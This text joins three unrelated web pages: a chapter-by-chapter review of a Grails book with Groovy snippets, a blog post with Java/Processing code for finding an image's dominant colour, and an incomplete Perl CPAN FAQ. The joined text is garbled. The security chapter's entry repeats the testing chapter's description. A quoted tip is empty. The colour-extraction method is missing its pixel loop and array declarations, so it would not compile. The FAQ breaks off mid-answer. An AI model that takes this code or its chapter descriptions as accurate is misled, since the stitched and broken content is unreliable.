- Getting started and the Hello World story, gets your feet really very wet: creating a quote of the day application. For this, you create a controller, then a view, a Grails layout, followed by a domain and actions. By the end of this first chapter, you've even integrated AJAX functionality into the application.
- Example tip from the end of the chapter: "Rapid iterations are key. The most important take-away for this chapter is that Grails fosters rapid iterations to get your application up and running in record time, and you'll have a lot of fun along the way."
- "Chapter 2: The Groovy essentials":
The obligatory chapter in Grails books to introduce newbies to Groovy. Some books put this section in the back, as an appendix, but I prefer it here. Groovy shouldn't be hidden under a bushel!
Highlights:
- Covers Groovy in a very good way, covering all the standard fare (syntactic sugar and so on), as well as the very few Java constructs that are not supported by Groovy.
- The tips at the end of this chapter are handy: Use idiomatic Groovy, Experiment, Use methods (instead of closures) where appropriate, Use explicit types in method signatures. Also, remember that Groovy isn't simply a language for Grails, but also for testing, scripting, and much more.
Part 2: Core Grails
From pages 63 to 217, you learn the structure of basic Grails applications. If the book contained nothing other than these pages, you'd have your money's worth. The sequence of chapters begins by spending a lot of very well-spent time on the domain, followed by a chapter on the controller, with the next chapter dealing with the view. The final chapter of this part deals with testing. (Great to have that within the "Core Grails" part!) Plus, the sample application, covering various parts of several chapters, is started from the very beginning of this section.
- "Chapter 3: Modeling the domain":
Opening paragraph, reproduced here to show how reassuring and kind the tone of the whole book is: "In this chapter, we'll explore Grails' support for the data model portion of your applications, and if you're worried we'll be digging deep into outer joins, you'll be pleasantly surprised. We won't be writing a line of SQL, and you won't find any Hibernate XML mappings either. We'll be taking full advantage of the Convention over Configuration paradigm, which means less time configuring and more time getting work done."
Highlights:
- The concept of "domain-driven design" is introduced here and illustrated very well by means of an example. Validation via the constraints closure in the domain class is discussed in detail, including custom validation and cross-field validation. Also clarified are the relationships between constraints and the entries generated in the database by Grails. As also done in the Grails Refcard, 1-1, 1-m, and m-n relationships are outlined and explained in detail, again specified in the domain classes, using Groovy.
- An excellent explanation of GORM and its place in the world: "Object relational mapping (ORM) is the process of getting objects into and out of a relational database. It means that you can (mostly) be oblivious to the SQL that's happening behind the scenes. In Java applications, that role is usually handled by an ORM like Hibernate or JPA; in Grails, it's done by GORM, which takes full advantage of Grovy's dynamic typing to make data access simple."
- The validators table on page 77 would have been even better if it had been duplicated in a reference section at the end of the book. The Grails Refcard has a similar table on page 3, but without the handy examples and error properties that this table contains. However, the table in the Grails Refcard indicates that there are more validators than are shown in this book, where there is a reference to an on-line location of the complete list, which would have been better in a reference section at the end of the book.
- Example tip from the end of the chapter: "Learn the basic modeling options well. You'll spend a lot of time setting up Grails models in your future development work. Take the time to learn all the basic relationship types presented in this chapter. The test cases will give you valuable experimentation fodder."
- "Chapter 4: Putting the model to work":
A brilliant chapter. Here you learn the many ways in which the domain can be used in Grails applications, justifying the term "domain-driven design".
Highlights:
- You are shown how the UI is generated from the domain and you also learn how to customize the error messages displayed in the UI (which are shown depending on the constraints closure in the domain class). After introducing dynamic scaffolding, you're shown how to generate the files that define the scaffold, so that you can customize them.
- The dynamic finders section is very practical and you can play with the code immediately, which again underlines the power of the domain in the Grails world, since the dynamic finders are generated on the fly from the domain classes.
- The closing section on bootstrapping, for populating a database with some test data, should be an eye opener to anyone who doesn't know about this Grails feature.
- Example tip from the end of the chapter: "Use scaffolds for instant gratification and to stay motivated. Scaffolds give you a good feeling of progress and keep you focused on getting your app out the door. Also, don't be afraid of using scaffolding code for admin screens in production code."
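To illustrate "generated on the fly": none of the finder methods below is written anywhere; GORM synthesizes them at runtime from the property names of a hypothetical Post domain class with content and dateCreated properties:

```groovy
def lastWeek = new Date() - 7

// GORM parses the method name into a query: property + comparator
def exact  = Post.findByContent("Hello, Grails")
def recent = Post.findAllByDateCreatedGreaterThan(lastWeek)

// Comparators compose with And / Or
def hits = Post.findAllByContentLikeAndDateCreatedGreaterThan("%grails%", lastWeek)
```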
- "Chapter 5: Controlling application flow":
The chapter on controllers. It covers—controller essentials, services, data binding, command objects, working with images, intercepting requests with filters, and custom URL mappings.
Highlights:
- Good to see services discussed in the same chapter as controllers. It took me a long time to understand the role of services, which this chapter covers well: "In this section, we'll extract all of our new-post functionality into a Grails service that we can call from anywhere we like. It will make things a whole lot tidier and more maintainable."
- This is the first point in the book where data binding is discussed. Very good job is done, as usual, starting from a code snippet and then drawing general principles from that point.
- I learned about command objects for the first time (section 5.4): "The command object's purpose is to marshal data from form parameters into a non-domain class that offers its own validation." (For example, and this is the example used here, this could be useful for validating a 'password' field with a 'confirmPassword' field.)
- Techniques for dealing with images. Brilliant and practical as always. "Handling file uploads", "Uploading to the filesystem", and "Rendering photos from the database".
- You are introduced in some detail to "/grails-app/conf/UrlMappings.groovy". "This file is where you configure rules for routing incoming requests to particular controllers and actions."
Many very subtle techniques are discussed in this chapter. I need to spend a lot of time on all the tips and tricks here. Many new terms (a terminology section at the end of the book would also have been good)—flash scope, command objects, permalinks, wildcard support, filters (which you can use before/after a controller action is fired), whitelists, blacklists, and several others.
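A sketch of the command-object idea mentioned above, using the password/confirmPassword case (all names here are hypothetical):

```groovy
// Validated like a domain class, but never persisted
class SignupCommand {
    String userId
    String password
    String confirmPassword

    static constraints = {
        userId(blank: false)
        password(size: 6..20)
        // Returning an error-code string marks the field invalid
        confirmPassword(validator: { val, cmd ->
            val == cmd.password ? true : "signup.password.mismatch"
        })
    }
}

class UserController {
    // Grails binds request params into the command before the action runs
    def register = { SignupCommand cmd ->
        if (cmd.hasErrors()) {
            render(view: "register", model: [cmd: cmd])
        } else {
            // ... create the user and redirect ...
        }
    }
}
```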
- "Chapter 6: Developing tasty views, forms, and layouts":
The chapter on views. It covers—core form tags, custom tags, delicious layouts, and AJAX tags. In other words, it goes beyond tagging, to the layout of your views, as well as the integration of JavaScript libraries to create AJAX effects.
Highlights:
- Custom tags. Section 6.2 shows how you can create custom tags to supplement those provided by Grails. You're also shown (page 167) how to change the namespace from the default g: to whatever you want it to be. (Again, practical little tip: "It's best to use short namespaces to reduce typing.")
- The discussion (6.3.1) on page decoration via SiteMesh is very interesting, showing how to set up custom page layouts. Skinning and navigation tabs are described too.
- JavaScript libraries Scriptaculous, YUI, jQuery—all are mentioned or discussed in detail, together with JSON.
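A minimal custom tag of the kind section 6.2 describes, including the namespace override mentioned on page 167 (the tag itself is a hypothetical example):

```groovy
// grails-app/taglib/DateTagLib.groovy
class DateTagLib {
    static namespace = "my"   // use <my:...> instead of the default <g:...>

    // In a GSP: <my:niceDate date="${post.dateCreated}"/>
    def niceDate = { attrs ->
        out << (attrs.date?.format("dd MMM yyyy") ?: "")
    }
}
```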
- "Chapter 7: Building reliable applications":
The chapter on testing. It covers—unit testing, integration testing, and functional testing.
Highlights:
- Good introduction to testing in general, leading up to a very strong endorsement of test-driven development. Mock objects are also covered (7.2.3).
- Excellent—you are shown how to unit test each part of your Grails application. Subsections focus on (7.2.1) domain classes, (7.2.2) services, (7.2.4) controllers, and (7.2.5) tag libraries.
- The use of several tools and plugins are included—functional test plugin, Selenium, JsUnit, and fixtures.
- Example tip from the end of the chapter: "Test at all levels. We can't stress this enough: make sure that you're testing at both the unit and functional levels. Even if there is some overlap and redundancy, that's better than having gaps in your test coverage."
Alternative view technologies, especially Wicket, might have been discussed, either here or elsewhere in this book. Personally, I've drunk the Wicket juice and believe, along with other Wicket believers, that code should not be mixed inside the view layer, which is what JSP and GSP are both guilty of. I know there's a Wicket plugin for Grails and would have been interested in having a thorough introduction to how to integrate it somewhere in this book. The AJAX component model that Wicket provides is one area where the Wicket approach might be preferable to the heavy tagging (i.e., further embedding of code into the view layer) imposed by the way Grails handles AJAX.
Part 3: Everyday Grails
This part excellently covers exactly those topics I wanted to learn about after reading the previous chapters. I.e., the questions I was then left with were: "What about autocompletion, charts, and similar features?", "What about step-by-step forms, i.e., how to transfer data between pages?", "What about security?", "What about REST?" In addition to these topics, there is also a very interesting discussion about the integration of JMS and Quartz, via the respective plugins.
- "Chapter 8: Using plugins: adding Web 2.0 in 60 minutes":
Some plugins have already been referenced or used earlier in the book. Here, though, we get a first look at the plugin architecture of Grails applications. After the architecture and installation explanations, very practical explanations are provided on adding charts and graphs, as well as mail support. Ten pages on adding a full text search feature, as well as a bunch of typical UI features, such as tooltips, autocompletion, and calendars, are included as well.
Highlights:
- Charts and graphs. Starts with a nice intro "Creating your first chart", which really shows how to get started with charts, from scratch. And, before you know it, you've created a 3-D pie chart, a Google bar chart, and a multiseries line chart.
GrailsUI plugin discussed in detail: "There are numerous Grails plugins for adding more UI sizzle to your app, but one of the most popular (and easy to use) is the GrailsUI plugin." Via this plugin, you're introduced to tooltips, rich-text editing, calendar-style dates, and autocomplete.
- A tip at the end of the chapter: "Explore GrailsUI. The GrailsUI plugin has a wealth of custom components you can use. You know all the basics now, so adding new components to your library will be easy. Take the time to browse the GrailsUI documentation to see what UI features are available."
- "Chapter 9: Wizards and workflow with webflows":
Here's the problem statement solved in this chapter: "What if you have a signup process that spans several pages? Or what if your shopping cart checkout needs to optionally give the user shipping preferences based on their location? You can solve these issues with your current knowledge of controllers and a bunch of redirects with hidden form variables, but you'd be writing your own state engine, and depending on the complexity of the flow, things can get complex quickly."
Highlights:
- Covers the way Grails handles web flows, in a lot of detail, with many code snippets. Yet another great and succinct definition: "A Grails webflow is a series of logical steps displaying various screens through which the user progresses to arrive at a final destination."
- Many practical tips & tricks throughout this chapter. I.e., when to use webflows, but also when NOT to use webflows. Inevitably, since the book focuses so strongly on testing, there's even a discussion (section 9.4) entitled "Testing webflows".
- Very good code snippet (page 258) is analyzed and expanded upon in a lot of detail to explain how webflows work. And how about this code snippet for an apposite example: "Invoking a stateful service to validate the card." The code snippets throughout this chapter, as everywhere else, are excellent.
- "Chapter 10: Don't let strangers in - security":
The chapter on testing. It covers—unit testing, integration testing, and functional testing.
Highlights:
- All the view tags for a custom login form, on page 300, is yet another example of how directly usable this book is.
- Plugins discussed—Authentication plugin, JSecurity plugin, and Spring Security (Acegi) plugin. Also JAAS. However, the focus is on the Spring Security plugin, with the first step how to install it and then you integrate it very quickly and easily into your application.
- A tip at the end of the chapter, about obfuscation: ."
- "Chapter 11: Remote access":
The chapter focuses mainly on REST. Then, it also shows RMI (via the remoting plugin) and SOAP. As usual, a long list of very useful best practices closes the chapter. Nice segway from previous chapter: "Now that you have a good grounding in securing an application from attack and unauthorized access, it's time to look at how other software (other than web browsers) can use and interact with your Grails applications."
Highlights:
- Over 20 pages on REST so set you on the right track—choosing resource IDs, providing access to resources, serializing & deserializing, as well as a section on testing your REST API.
- Thorough introduction to the Grails Remoting plugin, including a comparison of remoting protocols, RMI, HTTP invoker, and Caucho's Hessian & Burlap. The next section discusses SOAP, via the Grails plugins for Axis.
- Example tip from the end of the chapter: "Put some thought into your URLs. Good URLs are long-lived, consistent, and easy to understand. Although poor URLs are unlikely to have an impact on your API feature-wise, they can make life harder for those using it. If you do that, users will not bother using it. You can find plenty of articles on-line about good URL design."
- "Chapter 12: Understanding messaging and scheduling":
The chapter on JMS (messaging) and Quartz (scheduling).
Highlights:
- Nicely practical focus for the messaging story: "In this chapter, we'll add a messaging system to our application so we can create a link between it and Jabber, a popular instant messaging system." Similarly, here's the focus in the scheduling part of the chapter: "Kicking off a daily backup? Sending out daily digest emails? Regenerating your full text index? Every developer needs to deal with these kinds of scheduled events occasionally."
- Excellent introduction to messaging in general, covering a lot of common terminology, such as 'products','consumers', 'topics', and 'queues'. Nice diagrams too.
- Covers everything you'll want to know about messaging and scheduling—with heaps of code snippets again—plus the usual tips and tricks at the end of the chapter. Very clear as always: "Use queues when you want a message to be processed by one listener, and use topics for broadcast scenarios."
Part 4: Advanced Grails
- "Chapter 13: Advanced GORM kung fu":
Deals with tuning your queries to run more efficiently, query-caching options, and the refactoring of domain classes. Performance and scalability of your application, where it relates to GORM is handled in detail here. The P6Spy plugin and JMeter are installed and used to analyze query timings, handy when preparing for getting overloaded by queries as the application gets bigger and more popular.
- "Chapter 14: Spring and transactions":
Bit of a deepdive into the underpinnings of Spring, beneath the Grails framework. I have a feeling that one should never actually need to go this far, in typical cases, but that's why this is part of the advanced part of the book so it's good to have there. I'm not advanced enough at this point to really get a lot out of this chapter, though I'm sure I'll get back to it later.
- "Chapter 15: Beyond compile, test, and run":
The chapter that focuses on influencing and extending the build cycle. Integration with existing build tool, as well as Grails' own build system, i.e., Gant is introduced.
Highlights:
- The reason given for the existence of Gant seems a bit tenuous. After stating that Grails could have used one of the existing build tools, requiring you to download Ant or Maven and then set it up, page 417 explains: "that would go against the Grails philosophy of providing everything you need out of the box (except Java)!" I can't help but think that he reason for Gant is simply that it provides the developer with a Groovy approach to Ant scripting.
- Section 15.1.2 is great, teaching you step by step how to create a brand new Grails command "grails dist", which creates a distribution for your Grails applications.
- Section 15.2 is excellent in catering to those who have already standardized on Ant or Maven, meaning that the Gant system cannot be adopted in such cases. The Maven Grails archetype is introduced in 15.2.2, while the previous subsection uses Ant and Ivy instead of Gant as your build tool.
- "Chapter 16: Plugin development":
Everything you need to know about creating your own plugins that extend the features offered by the Grails framework to your applications—creating your first plugin, publishing & testing your plugin, and integrating with the Grails infrastructure.
Highlights:
- Didn't know this before: you can run a plugin using 'run-app', just like a standard Grails application. Also: "The most visible difference between a plugin and an application is the presence of a plugin descriptor, the SecurityGrailsPlugin.groovy file."
- "Integrating with Grails" covers a lot of interesting material—adding your own dynamic methods, handling class reloading at runtime, cofiguring your own Spring beans, adding entries to the application's web.xml (i.e., dealing with servlets and filters), and implementing extra commands.
- Example tip from the end of the chapter: "Use local plugin repositories for teams. Local plugin repositories serve several purposes. First, they allow you to control which versions of plugins are installed by your team by default. Second, they allow you to customize public plugins foryour own purposes. Last, they can be useful for modulerizing applications."
Mike Miller replied on Fri, 2009/07/10 - 11:15pm
Nice review. I've been waiting on a review of this book.
I recently reviewed "The Definitive Guide to Grails" which appeared in the Groovy Zone on this site, but I am a BIG fan of the "In Action" series of books. Now I need to figure out if I should read this book too because I am really enjoying Groovy and Grails. | http://groovy.dzone.com/reviews/grails-action | CC-MAIN-2014-10 | refinedweb | 3,327 | 62.27 |
Have you ever used strings before? That's right, those "arrays of characters" we all know and love? Unless you code only in C, I'd bet you have - and maybe even a lot.
But what about using a lot of strings? Or using strings that your program didn't generate? Maybe you're reading an email, parsing command line arguments, or reading human instructions, and you just need a more structured way to handle this.
Sure, you could iterate over each word or element in the strings. And you'll probably understand the code you used to do so. But for large applications, that can become very overwhelming - and very expensive to maintain.
Enter: The Regular Expression
Without getting too deep into computer science, let's define a Regular Expression real quick.
- Regular expressions are the grammars describing a Regular language
- Regular languages are a form of formal language that can be described by a finite state machine
There are a number of better explanations on regular languages out there, so if you're not happy yet, just google for a couple minutes.
Enter: The Regex
If it hasn't already, here's where it gets funky... I draw a distinction between what programming languages call "regular expressions" and what computer science calls a regular expression.
- Computer Science Regular Expression - a grammar to describe a regular language
- Programming Language Regular Expression - a grammar to describe, at most, a context-sensitive language
Context-sensitive languages are a good deal more complex and useful, so we'll call a programming language regular expression "regex" now to solidify the distinction that its languages are not regular.
Learning to Write Regexs
Regexs are described between //'s and match strings if they fit the 'pattern' defined between the two //'s. For instance,
/Hi/ matches "Hi", so we can check a string to see if it is (or has, more on that later) "Hi" in the string using a regular expression.
We match characters in a string with regular expressions by typing them normally. For instance,
/Hello World/ will match the string "Hello World".
We could simplify this to match any word by adding a little regex magic:
\w matches any "word" made of only letters:
\w will match any one word (if only letters).
We can similarly match numbers with
\d.
Example 1
Great, so we can perform string equality or see if strings fit some simple pattern now. So what? Can they be more useful?
You bet! Let's say we wrote an IRC chat bot that listens for someone to say "Josh". Our bot basically scans each message someone says in the channel until we get a match. Then, the bot will respond "Woah, I hope you aren't talking bad about my pal Josh!" Because Josh's only friends are robots.
...
Our bot will use the pattern
/Josh/ to match the strings.
Suddenly, some named Eli stumbles along: "Eli: Josh, do you really need that much caffeine?"
Our bot will kick in gear and scan the message with
/Josh/ and find one match! So he replies, and Eli is sufficiently creeped out. Mission accomplished!
Or was it?
What if our bot was more intelligent? What if the bot addressed whoever spoke by name? Something like "Woah, I hope you aren't bad-mouthing my buddy Josh, Eli."
Quantifiers (Repeating Characters)
0 or Many
We can do that... but we've got to learn a few things to get there. First off, Quantifiers (for Repeating characters).
We can use * to match 0 or many characters before it. For instance,
/a*/ matches "aaaaa" BUT ALSO "". That's right, it will match the empty string.
* serves to match something optional, because the character it matches doesn't have to exist. But it can. And it can exist many, many times (theoretically infinitely many times).
We can match "Josh" with
/Josh/, but we could also match "JJJJJJJJJosh" and "osh" with
/J*osh/.
1 or Many
+ can be used to match 1 or many characters. It effectively works the same way as * does, except the character existing is no longer optional. We have to have at least one of those characters to match now.
So, we can match "JJJJosh" and "Josh" with
/J+osh/ but not "osh".
Wildcards
Great, we can match a lot more interesting features now. Maybe someone screaming "Joooosh" if they're really mad at me...
But what if they're so mad that they slam their face on the keyboard? How do we match "afuhiudgosigs" if we don't know how pointy their nose is?
With Wildcards!
Wildcards allow you to match ANYTHING. Their syntax is
.. (Yes, just a period. Period.). You'll probably use this a lot, so don't confuse it for matching the end of a sentence.
We can use this to match "Joooafhuaisggsh" by combining our knowledge of repeating characters and wildcards in this regex:
/Jo+.*sh/. To be clear, this will match 1 "J", 1 or more "o", 0 or many wildcards, and 1 "s" and 1 "h". Those five blocks lead us to what we call...
Character Groups
Character Groups are the blocks of characters that appear in order in a string. When you use a
* or
+, you're actually matching many of the last character group, not just the last character.
This is useful to understand in its own right, but combined with repeating characters, can be very powerful. To do this, we can define our own character group by using parenthesis (that's these guys).
Let's say we want to repeat "Jos" but not "h". So "JosJosJosJosJosh" will match. We can do this with the regex
/(Jos)+h/ Easy, right?
But finally... back to our example, how can we get Eli's name in the IRC chat message he sent?
Character groups are also a means of remembering parts of the string. This way we can add parts of a string to variables in our programming code when we see a string that fits the pattern.
To do this, typically you'll do something like
\1 to match the first specified group.
For instance,
/(.+) \1/ is a special one. Here we look at a group of random characters 1 or more times, have a space afterwards, and then repeat the exact same characters again. So this regex will match the string "abc abc" but not "abc def" even though "def" would match
(.*) independently.
Remembering matches is very powerful, and it will probably boil down to the most useful feature of programming with regular expressions.
Example 2
Whew... finally ready to continue with our IRC bot. Let's use what we learned to see who was talking smack.
If we want to capture the sender's name when they say "Josh", our regex can look like this:
/(\w+): .*Josh.*/ and we can save the match as a variable in our programming language for our reply.
That's just 1 or more letters followed by ": ", a wildcard for 0 or many characters, the string Josh, and a wildcard for 0 or many characters.
Note:
/.*word.*/is a simple way to match a string containing "word" that may or may not have other things around it.
In Python, that regex might look like this:
import re pattern = re.compile(ur'(\w+): .*Josh.*') # Our regex string = u"Eli: Josh go move your laundry" # Our string matches = re.match(pattern, string) # Test the string who = matches.group(1) # Get who said the message print(who) # "Eli"
Notice we used
.group(1) just like we'd use
\1 in the regex pattern. Nothing new here, aside from using the regex in Python.
Beginning and End
Until now, we've actually allowed matching strings to occur in any part of the string. For intsance,
/(Jos)+h/ will match any string containing the Jos-repeating-h anywhere in the stringg.
What if we wanted the string begin with Jos-repeating-h? We can specify this with
/^(Jos)+h/, where
^ matches the start of the string.
Similarly,
$ can be used to match the end of the string.
So if we want our pattern to match strings containg Jos-repeating-h from beginning to end, we can alter it to look like this:
/^(Jos)+h$/.
Character Options
But maybe you're writing a regex for a sandwich order. You don't know if the customer wants white or wheat bread, but you'll accept either. How do you add choice in a regex? With Character Options!
Character Options allow you to specify a set of possible values for a group. Syntax for this is
(white|wheat) in the context of our sandwhich, where either "white" or "wheat" would be accepted.
You could also use the
[brackets] to specify options in another way. Each character is an option here, instead of the total string of characters. I.e., "b", "r", "s", "t", e", "k", "c", "r" would each be accepted individually. But this could be handy for more complicated groups, as you can substitute a character for a more complicated expression inside a Character Group here.
Modifiers
We talk about regex's with
/slash marks/, right? We know what goes in the middle, but what goes on the sides?
Plot twist, nothing.
... goes on the left. The right side, however, has some very, very useful stuff. It's almost a shame we ignored it for so long!
Modifiers modify the rules with which the regular expressions are applied.
Here's a list of the most common modifiers (from Regex101.com):
For instance, until now, all of our examples have been case-sensitive. That means, capitalizing or lower-casing any one character would make that string no longer match the pattern. We can make our patterns case-insensitive with the
i modifier.
Maybe Eli was so mad at me that he spammed the chat with a Mix OF casE CHArACters. Never fear,
i is here! We can match his "I hAate LiVing witH JOSH!!!" rage with
/i ha+te living with josh!+/i. Now it's easier to read and more powerful and useful. Awesome!
I'll leave the rest of the modifiers for you to play with on your own, but I bet you'll find
igm to be your most used in general.
What's next?
Hopefully this article has shown you another useful way to interact with strings a little bit more intelligently. I've hardly even scratched the surface of regexs, but you already know how to use regular expressions for some minor tasks now.
There's an overwhelming number of symbols / tokens to use in your regexs. Typically you'll stumble on them from Stack Overflow searches, or you'll guess them from previous experience (\n is the new line character, for instance). You've more or less got what you need for now, but there's plenty still to learn.
You can get a full list of tokens and test your regexs extensively here. I still use this website almost every time I write regexs, because the testing tool is remarkably helpful and powerful. It even generates code for you if you're not sure how to do it in your programming language yet.
If this was a cakewalk for you, check out regex crossword puzzles. They'll really get you thinking with regex!
Discussion (6)
Hey, this is a great write-up! I've generally stayed as far away from regex as I can, but this actually has me thinking I can tackle it. Thanks!
regex101.com/
Thanks for all the kind words, everyone! I've been hoping to write a follow-up article to this since I originally wrote it in early 2017, but it's only in the brainstorming stages today. I do plan to convert this into a talk and give it at a few conferences around my area, though. Let me know if you're interested to have a little bit of a different talk at your meetup/conference, covering regexes and how I think they could save you lots of headaches :)
hi josh, stumpled upon this in dec'17. trying to solve this python kata codewars.com/kata/regex-password-v... and my regexp is rusty. are you interested not in giving me the solution, but showing me how to say and in RegEX and i read here stackoverflow.com/questions/469913...
best regards and happy coding
Trying to figure out a freecodecademy challenge with regex, and this was extremely helpful. Thanks!
Incredible! Beat write up on regex I've ever read. 🤘💯 | https://dev.to/hawkinjs/dont-fear-the-regex-a-practical-introduction-to-regular-expressions | CC-MAIN-2021-49 | refinedweb | 2,089 | 74.08 |
I’ve had an idea in mind for a while now, that requires extracting the dominant color from an image. I had no idea how to do this, and worried it would be really hard.
The first thing was extracting the pixels from the image for processing, this was super easy thanks to this handy image processing tutorial.
Some Googling took me to Stack Overflow (always a great starting point) and I discovered the concept of color “bins” – this makes sense, I’d imagine it’s quite possible that all pixels in an image are subtly different, and actually you want to group them in some way. This led me to find out about calculating distances between colors, which is a solved problem, but somewhat complicated.
Finally I ended up looking at HSB colors – hue, saturation, brightness, and this really simple tutorial. Colors are represented on a cone, and the values are as follows (from the tutorial).
Hue is the actual color. It is measured in angular degrees counter-clockwise around the cone starting and ending at red = 0 or 360 (so yellow = 60, green = 120, etc.).
Saturation is the purity of the color, measured in percent from the centre of the cone (0) to the surface (100). At 0% saturation, hue is meaningless.
Brightness is measured in percent from black (0) to white (100). At 0% brightness, both hue and saturation are meaningless.
At this point, it was clear to me that what I really wanted to do was to extract the dominant hue, and then I planned to average the brightness and the saturation. In the end, I decided to average the brightness and saturation for that hue, rather than for the entire image.
After this, it should have been easy, but I had some confusion in terms of the range of hues, and converting from HSB to RGB. This I eventually fixed by just setting the ColorMode and working purely in HSB. The ColorMode allows me to set the maximum range, and as I just round the float to an int I can make my buckets bigger or smaller according to that. It turned out that 360 ended up being pretty close to what I want, although I think 320 is slightly better! It’s interesting to see the change of the extracted “dominant” color as the buckets change in size.
If you liked this, you might also be interested in: Colors of the Internet (which I found as I was waiting for pictures to upload to this post – beautiful timing!)
Source Code
import processing.core.PApplet; import processing.core.PImage; @SuppressWarnings("serial") public class ImageViewApplet extends PApplet { PImage img; float hue; static final int hueRange = 360; float saturation; float brightness; public void setup() { size(640,600); background(0); img = loadImage("" /* Your image here */); colorMode(HSB, (hueRange - 1)); extractColorFromImage(); } public void draw() { image(img, 0, 0, 640, 480); fill(hue, saturation, brightness); rect(0, 480, 640, 120); } private void extractColorFromImage() {(pixel); hues[hue]++; saturations[hue] += saturation; brightnesses[hue] += brightness; } // Find the most common hue. int hueCount = hues[0]; int hue = 0; for (int i = 1; i < hues.length; i++) { if (hues[i] > hueCount) { hueCount = hues[i]; hue = i; } } // Set the vars for displaying the color. this.hue = hue; saturation = saturations[hue] / hueCount; brightness = brightnesses[hue] / hueCount; } }
4 thoughts on “Extracting the Dominant Color from an Image in Processing”
Wow this is so good..
Actually i still confuse with the “@SuppressWarnings(“serial”)” and
“public class ImageViewApplet extends PApplet {}”
I can’t run the program with it. So I decide to remove it.
I wanna ask for something, can I use this code for my project?
I will be very, very, grateful if you allow me… Surely I will insert this honorable source in my references..
Maybe I will also modified the program a little…
may I do that all?
Thank you very much! ^_^
[WORDPRESS HASHCASH] The poster sent us ‘0 which is not a hashcash value.
Thanks a lot !!!!!! | https://cate.blog/2013/08/26/extracting-the-dominant-color-from-an-image-in-processing/ | CC-MAIN-2020-50 | refinedweb | 662 | 61.56 |
Can you make a script run in Python 2 with an argument?
Is there a way of making a script run in Python 2 with an argument in the Run Options?
If not, is there another way of making a specific script run in Python 2 when Python 3 is my default setting?
@JSOgaard you can start a script in Python 2 with
from objc_util import * import os app = 'myfolder/myapp.py' path = os.path.expanduser('~/Documents/'+app) arg = ['1','2'] I2=ObjCClass('PYK2Interpreter').sharedInterpreter() # run a script like in wrench menu (path, args, reset env yes/no) I2.runScriptAtPath_argv_resetEnvironment_(path, arg, True)
@JSOgaard I don't remember for the App Store version but the beta provides this when you long press the run button | https://forum.omz-software.com/topic/5780/can-you-make-a-script-run-in-python-2-with-an-argument | CC-MAIN-2020-45 | refinedweb | 125 | 65.83 |
Common Questions About CPANby Jarkko Hietaniemi
July 29, 1999
CPAN Frequently Asked Questions
Here are answers to some of the questions most frequently asked about CPAN and related Perl resources.
I. - General Questions.
- What is Perl?
- What is Perl6?
- What is the CPAN?
- What is PAUSE?
- How does the CPAN work?
- How does the CPAN multiplexer work?
II. - The Quest for Perl source, modules and scripts.
- Where can I find the current release of the Perl source code?
- Where can I find older/obsolete versions of Perl or Perl Modules?
- How do I interpret the Perl version numbers?
- How do I install Perl from the source code?
- Where can I find Perl modules?
- How do I install Perl modules?
- How do I find out what modules are already installed on my system?
- Where can I find the most recently uploaded Perl modules?
- Where can I find Perl modules for Windows?
- Where can I find Perl binaries/packages or Perl module binaries?
- How are Perl and the CPAN modules licensed?
- Does the Perl source distribution include any modules?
- What modules are platform dependent?
- Where can I find Perl scripts?
III. - RIF [ Reading is Fun-duh-mental ]
- Where can I find the Perl FAQs?
- Where can I find Perl documentation?
- Where can I find Perl module documentation?
- Where can I find Perl DBI/DBD/database documentation?
- Where can I find/join/create Perl mailing lists?
- Where can I find Perl journals/magazines?
- Where can I find Perl courses/training/on-line tutorials?
- Where can I find CPAN on a CD-ROM?
- How do I find/join/organise a Perl User Group?
- Where can I find a history of Perl releases or a general history of the Perl community?
IV. - Danger Will Robinson! Danger! Danger!
- I got an error downloading a module, what should I do?
- I downloaded a module/script/file but it was corrupt, what should I do?
- How do I use module Foo::Bar, can you help? (a.k.a. Are you a helpdesk?)
- When downloading a module a strange VRML viewer started up and I got an error, what should I do?
- Where can I find the GDBM_File/DB_File module?
- I'm having trouble with search.cpan.org, whom do I need to contact?
V. - Searching CPAN, CSPAN and the rest of the known universe.
- How do I search CPAN?
- How do I search for module/script documentation? (a.k.a. "How do I use ..."?)
- How do I search for really ANYTHING?
- How do I find Ralph Nader? (a.k.a. We're C-P-A-N not C-S-P-A-N!)
VI. - Contributing modules, patches, and bug reports.
- How do I contribute modules to CPAN?
- Does CPAN allow contributions of shareware or code that requests a fee of any kind?
- How do I contribute scripts to CPAN?
- How do I contribute documentation?
- How do I report/fix a bug in Perl and/or its documentation?
- How do I report/fix a bug in a module/script?
- How do I go about maintaining a module when the author is unresponsive?
- How do I adopt or take over a module already on CPAN?
- Is there a site for module bug reports/tests?
- Does CPAN provide download statistics for authors?
VII. - How to mirror CPAN.
- How do I mirror CPAN?
- What do I need to mirror CPAN?
- I have Windows 2000/NT/98/95, how can I mirror CPAN?
- Which CPAN site should I mirror?
- How do I register my mirror to make it a public resource?
What is Perl?

Perl is a high-level, general-purpose programming language created by Larry Wall. It excels at text processing, system administration, and web programming.

See also:
Two good starting points for Perl information are and
What is Perl6?
"We're really serious about reinventing everything that needs reinventing." --Larry Wall
What is CPAN?
CPAN is the Comprehensive Perl Archive Network, a large collection of Perl software and documentation. You can begin exploring from either, or any of the mirrors listed at.
What is PAUSE?

PAUSE is the Perl Authors Upload SErver, the registration and upload service through which authors contribute their modules and scripts to CPAN.
How does the CPAN work?

Authors upload their work through PAUSE to the CPAN master site, which is in turn mirrored by hundreds of sites around the world, so the same content is available from a server near you.
How does the CPAN multiplexer work?

The multiplexer (for example the one run by perl.com) redirects your request to a CPAN mirror that is, hopefully, near to you. This spreads the load across the mirror network, which is why you often aren't downloading from the site you originally contacted.
Where can I find the current release of the Perl source code?
- - A detailed list of source code offerings.
The Perl Mongers have a "Download Perl" button for websites and if you are interested you can find it on their site at.
Where can I find older/obsolete versions of Perl or Perl Modules?
-
-
-
- - for old versions of modules
How do I interpret the Perl version numbers?

At the time of writing, Perl versions look like 5.005_03. Subversion numbers _01 through _49 are reserved for stable maintenance releases, while _50 through _99 denote unstable developer releases. See perldoc perlhist for the full release history.
How do I install Perl using the source code?

On most platforms the procedure is the standard one described in the INSTALL file that ships with the source: run Configure, then make, make test, and make install. The exceptions are:
- MacOS (1)
- AS/400 (2)
- Novell Netware (2)
For these platforms a binary release may be the easiest path.
- The source code to compile MacPerl is available at.
- The source code for AS/400 and Netware Perls has not been merged into the main Perl source code distribution. If you want to try compiling them yourself, get the sources from or and then continue at
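On most Unix-like platforms the build follows the steps described in the INSTALL file shipped with the source. As a sketch (assuming a C compiler is available, that the defaults chosen by Configure are acceptable, and that you may write to the installation prefix):

```shell
# Sketch: build and install Perl from an already-unpacked source tree.
# The directory name is whatever version you downloaded (hypothetical
# name shown in the example below).
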